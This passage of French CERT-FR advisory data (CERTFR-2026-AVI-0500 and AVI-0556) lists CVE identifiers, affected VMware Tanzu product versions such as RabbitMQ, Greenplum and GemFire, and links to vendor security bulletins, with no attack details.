"url": "https://www.cve.org/CVERecord?id=CVE-2026-22732"
},
{
"name": "CVE-2024-29133",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-29133"
},
{
"name": "CVE-2025-55163",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-55163"
},
{
"name": "CVE-2026-34487",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-34487"
},
{
"name": "CVE-2025-27555",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27555"
},
{
"name": "CVE-2025-65995",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-65995"
},
{
"name": "CVE-2022-3517",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3517"
},
{
"name": "CVE-2019-16943",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-16943"
},
{
"name": "CVE-2021-43797",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-43797"
},
{
"name": "CVE-2026-24842",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-24842"
},
{
"name": "CVE-2017-7525",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-7525"
},
{
"name": "CVE-2026-23950",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23950"
},
{
"name": "CVE-2019-20330",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-20330"
},
{
"name": "CVE-2026-2950",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-2950"
},
{
"name": "CVE-2020-14195",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-14195"
},
{
"name": "CVE-2018-10237",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-10237"
},
{
"name": "CVE-2019-12814",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-12814"
},
{
"name": "CVE-2020-35491",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-35491"
},
{
"name": "CVE-2019-17531",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-17531"
},
{
"name": "CVE-2026-32280",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-32280"
},
{
"name": "CVE-2023-52428",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52428"
},
{
"name": "CVE-2025-69873",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-69873"
},
{
"name": "CVE-2020-14061",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-14061"
},
{
"name": "CVE-2024-6485",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6485"
},
{
"name": "CVE-2025-67735",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-67735"
},
{
"name": "CVE-2022-42004",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-42004"
},
{
"name": "CVE-2025-68458",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68458"
},
{
"name": "CVE-2021-22569",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-22569"
},
{
"name": "CVE-2020-11619",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-11619"
},
{
"name": "CVE-2026-29786",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-29786"
},
{
"name": "CVE-2025-26791",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-26791"
},
{
"name": "CVE-2020-36183",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-36183"
},
{
"name": "CVE-2026-25854",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25854"
},
{
"name": "CVE-2021-22573",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-22573"
},
{
"name": "CVE-2020-8840",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-8840"
},
{
"name": "CVE-2026-2332",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-2332"
},
{
"name": "CVE-2025-58056",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58056"
},
{
"name": "CVE-2026-1526",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-1526"
},
{
"name": "CVE-2019-0205",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-0205"
},
{
"name": "CVE-2024-47875",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47875"
},
{
"name": "CVE-2022-41854",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-41854"
},
{
"name": "CVE-2026-33672",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33672"
},
{
"name": "CVE-2020-8908",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-8908"
},
{
"name": "CVE-2024-37890",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-37890"
},
{
"name": "CVE-2020-36184",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-36184"
},
{
"name": "CVE-2023-42503",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-42503"
},
{
"name": "CVE-2024-56373",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56373"
},
{
"name": "CVE-2026-25639",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25639"
},
{
"name": "CVE-2020-36180",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-36180"
},
{
"name": "CVE-2024-28863",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-28863"
},
{
"name": "CVE-2021-31684",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-31684"
},
{
"name": "CVE-2022-25857",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-25857"
},
{
"name": "CVE-2022-38751",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-38751"
},
{
"name": "CVE-2025-25193",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-25193"
},
{
"name": "CVE-2020-36518",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-36518"
},
{
"name": "CVE-2026-22735",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22735"
},
{
"name": "CVE-2025-5889",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-5889"
},
{
"name": "CVE-2024-30171",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-30171"
},
{
"name": "CVE-2026-24733",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-24733"
},
{
"name": "CVE-2022-38900",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-38900"
},
{
"name": "CVE-2025-68157",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68157"
},
{
"name": "CVE-2017-15095",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-15095"
},
{
"name": "CVE-2019-14540",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-14540"
},
{
"name": "CVE-2024-36114",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36114"
},
{
"name": "CVE-2025-27789",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27789"
},
{
"name": "CVE-2019-12086",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-12086"
},
{
"name": "CVE-2025-48924",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-48924"
},
{
"name": "CVE-2022-38752",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-38752"
},
{
"name": "CVE-2025-8916",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8916"
},
{
"name": "CVE-2025-8885",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8885"
},
{
"name": "CVE-2025-41249",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-41249"
},
{
"name": "CVE-2022-38750",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-38750"
},
{
"name": "CVE-2021-21290",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-21290"
},
{
"name": "CVE-2018-11307",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-11307"
},
{
"name": "CVE-2026-26996",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-26996"
},
{
"name": "CVE-2020-10968",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-10968"
},
{
"name": "CVE-2022-42003",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-42003"
},
{
"name": "CVE-2020-25649",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-25649"
},
{
"name": "CVE-2025-68675",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68675"
},
{
"name": "CVE-2023-2976",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-2976"
},
{
"name": "CVE-2017-17485",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-17485"
},
{
"name": "CVE-2026-34483",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-34483"
},
{
"name": "CVE-2022-37599",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-37599"
},
{
"name": "CVE-2026-32141",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-32141"
},
{
"name": "CVE-2025-59419",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-59419"
},
{
"name": "CVE-2022-1471",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1471"
},
{
"name": "CVE-2019-14379",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-14379"
},
{
"name": "CVE-2023-26136",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-26136"
},
{
"name": "CVE-2026-33816",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33816"
},
{
"name": "CVE-2022-3171",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3171"
},
{
"name": "CVE-2026-25219",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25219"
},
{
"name": "CVE-2020-11112",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-11112"
},
{
"name": "CVE-2020-11111",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-11111"
},
{
"name": "CVE-2026-31802",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-31802"
},
{
"name": "CVE-2025-13465",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-13465"
},
{
"name": "CVE-2025-22227",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22227"
},
{
"name": "CVE-2026-27904",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27904"
},
{
"name": "CVE-2026-1225",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-1225"
},
{
"name": "CVE-2020-14060",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-14060"
},
{
"name": "CVE-2020-36188",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-36188"
},
{
"name": "CVE-2016-1000027",
"url": "https://www.cve.org/CVERecord?id=CVE-2016-1000027"
},
{
"name": "CVE-2024-57699",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57699"
},
{
"name": "CVE-2019-14892",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-14892"
},
{
"name": "CVE-2019-20445",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-20445"
},
{
"name": "CVE-2025-48734",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-48734"
},
{
"name": "CVE-2025-11226",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-11226"
},
{
"name": "CVE-2020-14062",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-14062"
}
],
"initial_release_date": "2026-04-27T00:00:00",
"last_revision_date": "2026-04-27T00:00:00",
"links": [],
"reference": "CERTFR-2026-AVI-0500",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2026-04-27T00:00:00.000000"
}
],
"risks": [
{
"description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans VMware Tanzu. Elles permettent \u00e0 un attaquant de provoquer un probl\u00e8me de s\u00e9curit\u00e9 non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans VMware Tanzu",
"vendor_advisories": [
{
"published_at": "2026-04-24",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 37405",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37405"
},
{
"published_at": "2026-04-24",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 37404",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37404"
}
]
}
CERTFR-2026-AVI-0556
Vulnerability from certfr_avis - Published: 2026-05-11 - Updated: 2026-05-11
De multiples vulnérabilités ont été découvertes dans les produits VMware. Elles permettent à un attaquant de provoquer un problème de sécurité non spécifié par l'éditeur.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
| Vendor | Product | Description | ||
|---|---|---|---|---|
| VMware | Tanzu | Tanzu RabbitMQ on Kubernetes versions 31.3.x antérieures à 3.13.15 | ||
| VMware | Tanzu Greenplum | Tanzu Greenplum Streaming Server For Kubernetes versions antérieures à 1.3.0 | ||
| VMware | Tanzu | Tanzu Data Flow on Kubernetes versions antérieures à 2.1.0 | ||
| VMware | Tanzu | Tanzu RabbitMQ on Kubernetes versions 4.0.x antérieures à 4.0.20 | ||
| VMware | Tanzu Greenplum | Tanzu Greenplum Backup and Restore versions antérieures à1.33.0 | ||
| VMware | Tanzu Greenplum | Tanzu Greenplum Data Copy Utility versions antérieures à 2.9.3 | ||
| VMware | Tanzu | Tanzu for Valkey on Kubernetes versions antérieures à 3.3.4 | ||
| VMware | Tanzu Greenplum | Tanzu Greenplum Command Center versions 6.17.x antérieures à 6.17.0 | ||
| VMware | Tanzu Greenplum | Tanzu Greenplum on Kubernetes versions antérieures à 1.1.0 | ||
| VMware | Tanzu Greenplum | Tanzu Greenplum Platform Extension Framework versions antérieures à 8.0.0 | ||
| VMware | Tanzu | Tanzu RabbitMQ on Kubernetes versions 4.2.x antérieures à 4.2.6 | ||
| VMware | Tanzu Greenplum | Tanzu Greenplum Text versions antérieures à 4.0.0 | ||
| VMware | Tanzu Greenplum | Tanzu Greenplum Streaming Server versions antérieures à 2.3.0 | ||
| VMware | Tanzu | Tanzu RabbitMQ on Kubernetes versions 4.3.x antérieures à 4.3.0 | ||
| VMware | Tanzu | Tanzu for Valkey on Kubernetes versions antérieures à 3.4.0 | ||
| VMware | Tanzu Gemfire | Tanzu GemFire versions antérieures à 10.2.3 | ||
| VMware | Tanzu Greenplum | Tanzu Greenplum Upgrade versions antérieures à 2.0.0 | ||
| VMware | Tanzu Greenplum | Tanzu Greenplumversions antérieures à 7.8.0 | ||
| VMware | Tanzu Gemfire | Tanzu GemFire Vector Database versions antérieures à 1.2.2 | ||
| VMware | Tanzu Greenplum | Tanzu Greenplum versions antérieures à 6.33.0 | ||
| VMware | Tanzu Greenplum | Tanzu Greenplum Command Center versions 7.7.x antérieures à 7.7.0 | ||
| VMware | Tanzu | Tanzu RabbitMQ on Kubernetes versions 4.1.x antérieures à 4.1.11 | ||
| VMware | Tanzu | Tanzu for MySQL on Kubernetes versions antérieures à 2.0.3 |
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "Tanzu RabbitMQ on Kubernetes versions 31.3.x ant\u00e9rieures \u00e0 3.13.15",
"product": {
"name": "Tanzu",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Tanzu Greenplum Streaming Server For Kubernetes versions ant\u00e9rieures \u00e0 1.3.0",
"product": {
"name": "Tanzu Greenplum",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Tanzu Data Flow on Kubernetes versions ant\u00e9rieures \u00e0 2.1.0",
"product": {
"name": "Tanzu",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Tanzu RabbitMQ on Kubernetes versions 4.0.x ant\u00e9rieures \u00e0 4.0.20",
"product": {
"name": "Tanzu",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Tanzu Greenplum Backup and Restore versions ant\u00e9rieures \u00e01.33.0",
"product": {
"name": "Tanzu Greenplum",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Tanzu Greenplum Data Copy Utility versions ant\u00e9rieures \u00e0 2.9.3",
"product": {
"name": "Tanzu Greenplum",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Tanzu for Valkey on Kubernetes versions ant\u00e9rieures \u00e0 3.3.4",
"product": {
"name": "Tanzu",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Tanzu Greenplum Command Center versions 6.17.x ant\u00e9rieures \u00e0 6.17.0",
"product": {
"name": "Tanzu Greenplum",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Tanzu Greenplum on Kubernetes versions ant\u00e9rieures \u00e0 1.1.0",
"product": {
"name": "Tanzu Greenplum",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Tanzu Greenplum Platform Extension Framework versions ant\u00e9rieures \u00e0 8.0.0",
"product": {
"name": "Tanzu Greenplum",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Tanzu RabbitMQ on Kubernetes versions 4.2.x ant\u00e9rieures \u00e0 4.2.6",
"product": {
"name": "Tanzu",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Tanzu Greenplum Text versions ant\u00e9rieures \u00e0 4.0.0",
"product": {
"name": "Tanzu Greenplum",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Tanzu Greenplum Streaming Server versions ant\u00e9rieures \u00e0 2.3.0",
"product": {
"name": "Tanzu Greenplum",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Tanzu RabbitMQ on Kubernetes versions 4.3.x ant\u00e9rieures \u00e0 4.3.0",
"product": {
"name": "Tanzu",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Tanzu for Valkey on Kubernetes versions ant\u00e9rieures \u00e0 3.4.0",
"product": {
"name": "Tanzu",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": " Tanzu GemFire versions ant\u00e9rieures \u00e0 10.2.3",
"product": {
"name": "Tanzu Gemfire",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Tanzu Greenplum Upgrade versions ant\u00e9rieures \u00e0 2.0.0",
"product": {
"name": "Tanzu Greenplum",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Tanzu Greenplumversions ant\u00e9rieures \u00e0 7.8.0",
"product": {
"name": "Tanzu Greenplum",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Tanzu GemFire Vector Database versions ant\u00e9rieures \u00e0 1.2.2",
"product": {
"name": "Tanzu Gemfire",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Tanzu Greenplum versions ant\u00e9rieures \u00e0 6.33.0",
"product": {
"name": "Tanzu Greenplum",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Tanzu Greenplum Command Center versions 7.7.x ant\u00e9rieures \u00e0 7.7.0",
"product": {
"name": "Tanzu Greenplum",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Tanzu RabbitMQ on Kubernetes versions 4.1.x ant\u00e9rieures \u00e0 4.1.11",
"product": {
"name": "Tanzu",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Tanzu for MySQL on Kubernetes versions ant\u00e9rieures \u00e0 2.0.3\n",
"product": {
"name": "Tanzu",
"vendor": {
"name": "VMware",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2025-8715",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8715"
},
{
"name": "CVE-2025-30681",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30681"
},
{
"name": "CVE-2018-19361",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-19361"
},
{
"name": "CVE-2019-12384",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-12384"
},
{
"name": "CVE-2025-69534",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-69534"
},
{
"name": "CVE-2025-61730",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61730"
},
{
"name": "CVE-2026-27135",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27135"
},
{
"name": "CVE-2019-17267",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-17267"
},
{
"name": "CVE-2025-3264",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-3264"
},
{
"name": "CVE-2018-19362",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-19362"
},
{
"name": "CVE-2025-15282",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-15282"
},
{
"name": "CVE-2026-33871",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33871"
},
{
"name": "CVE-2026-22737",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22737"
},
{
"name": "CVE-2020-26939",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-26939"
},
{
"name": "CVE-2021-29425",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-29425"
},
{
"name": "CVE-2025-53042",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53042"
},
{
"name": "CVE-2026-4878",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-4878"
},
{
"name": "CVE-2026-35238",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-35238"
},
{
"name": "CVE-2025-30689",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30689"
},
{
"name": "CVE-2026-27205",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27205"
},
{
"name": "CVE-2025-9231",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-9231"
},
{
"name": "CVE-2025-30715",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30715"
},
{
"name": "CVE-2024-37891",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-37891"
},
{
"name": "CVE-2025-30682",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30682"
},
{
"name": "CVE-2026-32990",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-32990"
},
{
"name": "CVE-2022-30973",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-30973"
},
{
"name": "CVE-2025-50102",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50102"
},
{
"name": "CVE-2026-1669",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-1669"
},
{
"name": "CVE-2026-39892",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-39892"
},
{
"name": "CVE-2023-33201",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-33201"
},
{
"name": "CVE-2026-33186",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33186"
},
{
"name": "CVE-2021-27906",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-27906"
},
{
"name": "CVE-2025-27516",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27516"
},
{
"name": "CVE-2018-14719",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-14719"
},
{
"name": "CVE-2026-34267",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-34267"
},
{
"name": "CVE-2023-50386",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-50386"
},
{
"name": "CVE-2026-21936",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-21936"
},
{
"name": "CVE-2026-21937",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-21937"
},
{
"name": "CVE-2025-66614",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-66614"
},
{
"name": "CVE-2020-15250",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-15250"
},
{
"name": "CVE-2016-1000341",
"url": "https://www.cve.org/CVERecord?id=CVE-2016-1000341"
},
{
"name": "CVE-2026-32286",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-32286"
},
{
"name": "CVE-2025-50100",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50100"
},
{
"name": "CVE-2020-9546",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-9546"
},
{
"name": "CVE-2020-13956",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-13956"
},
{
"name": "CVE-2026-35239",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-35239"
},
{
"name": "CVE-2026-3497",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-3497"
},
{
"name": "CVE-2025-53062",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53062"
},
{
"name": "CVE-2026-25990",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25990"
},
{
"name": "CVE-2026-32288",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-32288"
},
{
"name": "CVE-2021-36373",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-36373"
},
{
"name": "CVE-2020-10673",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-10673"
},
{
"name": "CVE-2024-12797",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-12797"
},
{
"name": "CVE-2025-12084",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-12084"
},
{
"name": "CVE-2020-35728",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-35728"
},
{
"name": "CVE-2026-0897",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-0897"
},
{
"name": "CVE-2025-5197",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-5197"
},
{
"name": "CVE-2026-34271",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-34271"
},
{
"name": "CVE-2019-10094",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-10094"
},
{
"name": "CVE-2026-24308",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-24308"
},
{
"name": "CVE-2025-11468",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-11468"
},
{
"name": "CVE-2025-30703",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30703"
},
{
"name": "CVE-2020-36181",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-36181"
},
{
"name": "CVE-2020-9548",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-9548"
},
{
"name": "CVE-2026-3446",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-3446"
},
{
"name": "CVE-2026-32875",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-32875"
},
{
"name": "CVE-2020-36182",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-36182"
},
{
"name": "CVE-2025-6069",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-6069"
},
{
"name": "CVE-2016-1000343",
"url": "https://www.cve.org/CVERecord?id=CVE-2016-1000343"
},
{
"name": "CVE-2020-24616",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-24616"
},
{
"name": "CVE-2020-10683",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-10683"
},
{
"name": "CVE-2022-24613",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-24613"
},
{
"name": "CVE-2025-50080",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50080"
},
{
"name": "CVE-2025-6075",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-6075"
},
{
"name": "CVE-2026-27456",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27456"
},
{
"name": "CVE-2026-22701",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22701"
},
{
"name": "CVE-2026-34270",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-34270"
},
{
"name": "CVE-2026-34303",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-34303"
},
{
"name": "CVE-2025-4330",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4330"
},
{
"name": "CVE-2025-2953",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-2953"
},
{
"name": "CVE-2020-36185",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-36185"
},
{
"name": "CVE-2025-50078",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50078"
},
{
"name": "CVE-2025-3933",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-3933"
},
{
"name": "CVE-2025-4138",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4138"
},
{
"name": "CVE-2025-61731",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61731"
},
{
"name": "CVE-2018-8036",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-8036"
},
{
"name": "CVE-2023-36632",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-36632"
},
{
"name": "CVE-2022-26612",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-26612"
},
{
"name": "CVE-2022-36364",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-36364"
},
{
"name": "CVE-2026-27143",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27143"
},
{
"name": "CVE-2019-16942",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-16942"
},
{
"name": "CVE-2025-30696",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30696"
},
{
"name": "CVE-2026-22009",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22009"
},
{
"name": "CVE-2018-1320",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-1320"
},
{
"name": "CVE-2025-13837",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-13837"
},
{
"name": "CVE-2020-9547",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-9547"
},
{
"name": "CVE-2026-29145",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-29145"
},
{
"name": "CVE-2025-24970",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-24970"
},
{
"name": "CVE-2025-49128",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-49128"
},
{
"name": "CVE-2026-21998",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-21998"
},
{
"name": "CVE-2019-17558",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-17558"
},
{
"name": "CVE-2020-36179",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-36179"
},
{
"name": "CVE-2026-35469",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-35469"
},
{
"name": "CVE-2020-13955",
